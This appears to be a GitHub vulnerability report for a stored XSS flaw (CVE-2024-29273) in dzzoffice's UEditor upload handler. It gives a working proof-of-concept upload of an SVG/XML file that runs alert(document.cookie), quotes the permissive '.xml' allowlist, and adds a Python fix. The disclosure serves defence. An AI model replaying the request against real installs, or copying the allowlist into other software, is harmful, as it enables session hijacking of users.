
Stored XSS Vulnerability in dzzoffice 2.02.1 SC UTF8 Due to Ueditor's Uploadfile Method #244

Open
Hebing123 opened this issue Mar 11, 2024 · 2 comments

Comments

@Hebing123

Hebing123 commented Mar 11, 2024

Summary

There is a significant Stored Cross-Site Scripting (XSS) vulnerability identified in dzzoffice 2.02.1 SC UTF8. This vulnerability allows the upload of XML files through Ueditor's uploadfile method, leading to the possibility of an XSS exploit. The potential for harm is elevated as the malicious scripts are permanently stored on the server and executed whenever the user accesses the saved file.

Detail

The vulnerability exists due to the application's failure to properly sanitize the XML files being uploaded via the uploadfile method of Ueditor. A possible exploitation would involve the unauthorized uploading of an XML file embedded with a malicious script. In this case, the XML file contains a JavaScript script that, when run, shows the user's cookies.

POC

POST /index.php?mod=attach&op=controller&action=uploadfile HTTP/1.1
Host: 192.168.160.147:8787
Content-Length: 563
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.160.147:8787
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXifIXP0SoqrCZIbo
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie:  Hmcz_2132_saltkey=udCaCtcc; Hmcz_2132_lastvisit=1710124655; Hmcz_2132_ulastactivity=c6a8N3U0dWA9gtpEK0bssjGSNkUV6J6j8JD4d5wderSfZMkI6s_P; Hmcz_2132_auth=bd19HGU2qM6RDikVsboyLG0RFWtF0mQx0B0i2a8hGy4-P_Bmk-ITz4Kr8hXlSsNfli-Cid5WguEwml4QSLJD; Hmcz_2132_checkupgrade=1; Hmcz_2132_viewid=tid_1; Hmcz_2132_checkappupgrade=1; Hmcz_2132_sid=iIedFD; Hmcz_2132_news_index_isshow=show; Hmcz_2132_forum_lastvisit=D_index_1710135494D_1_1710135495; Hmcz_2132_lastact=1710135618%09index.php%09attach
Connection: close

------WebKitFormBoundaryXifIXP0SoqrCZIbo
Content-Disposition: form-data; name="upfile"; filename="20c5297f-deaf-43e2-84ff-94e262f28087.xml"
Content-Type: text/xml

<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.cookie); </script> </svg>
------WebKitFormBoundaryXifIXP0SoqrCZIbo--

In the response (the attachment parameters) we get the file path DZZ/202403/11/135705v2thuiv96iyi5svx.xml

URL: http://192.168.160.147:8787/data/attachment/dzz/202403/11/135705v2thuiv96iyi5svx.xml


Impact

The impact of this vulnerability is substantial. Stored XSS attacks are potentially more devastating than other types as they can compromise a larger portion of users. Since the malicious script is stored on the server, every user who accesses the file would be a victim of the XSS attack.
In our case, the script displayed the user's cookies. However, a malicious attacker may design more harmful scripts to, for example, steal session cookies, perform actions on behalf of the user, or even carry out phishing attacks.
This vulnerability poses a serious security threat, and immediate remedial measures are recommended.

@Hebing123
Author

This is the vulnerability exploitation reference for CVE-2024-29273

@Hebing123
Author

Hebing123 commented Jul 1, 2024

Hello, I see in ueditor/php/config.js that you did not remove .xml from the file upload whitelist, which is what causes this vulnerability; it is not a false positive.

"fileAllowFiles": [
    ".png", ".jpg", ".jpeg", ".gif", ".bmp",
    ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg",
    ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid",
    ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso",
    ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml"
]
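One way to close the hole described in the report and in the comment above, as an added Python example that is not dzzoffice or UEditor code: the quoted allowlist with ".xml" removed, a check of the file's first bytes so a renamed SVG/XML document is still refused, and download-only response headers for stored attachments. The function names and the hardened list are assumptions made for illustration.

```python
import os
import re

# Hardened copy of the fileAllowFiles list quoted above, with ".xml" removed
# (".svg" is deliberately absent too: browsers render both as markup and run
# any <script> inside). Constructed for this example, not the project's config.
FILE_ALLOW_EXTS = frozenset({
    ".png", ".jpg", ".jpeg", ".gif", ".bmp",
    ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg",
    ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid",
    ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso",
    ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md",
})

# Leading bytes of an XML/SVG/HTML document (optional UTF-8 BOM), i.e. content
# a browser would render as a page and therefore execute scripts from.
MARKUP_DOC = re.compile(rb"\A(\xef\xbb\xbf)?\s*<(\?xml|!doctype|svg|html)\b", re.IGNORECASE)

def check_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). The extension allowlist alone is bypassed by
    renaming the file, so the first bytes are inspected as well."""
    ext = os.path.splitext(filename.lower())[1]
    if ext not in FILE_ALLOW_EXTS:
        return False, f"extension {ext or '(none)'} is not in the allowlist"
    if MARKUP_DOC.match(data[:1024]):
        return False, "content is an XML/SVG/HTML document"
    return True, "ok"

def attachment_headers(stored_name: str) -> dict[str, str]:
    """Response headers for serving any stored attachment: force a download,
    forbid MIME sniffing and sandbox whatever does get rendered, so a file can
    never execute script in the application's origin."""
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", stored_name)  # no header injection
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }

# The SVG-in-XML body from the PoC above, reproduced as constructed test input.
POC_XML = (b'<?xml version="1.0" standalone="no"?>\n'
           b'<svg xmlns="http://www.w3.org/2000/svg">'
           b'<script>alert(document.cookie)</script></svg>')

if __name__ == "__main__":
    print(check_upload("20c5297f-deaf-43e2-84ff-94e262f28087.xml", POC_XML))
    print(check_upload("renamed.txt", POC_XML))   # caught by the content check
    print(check_upload("notes.txt", b"plain text"))
```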
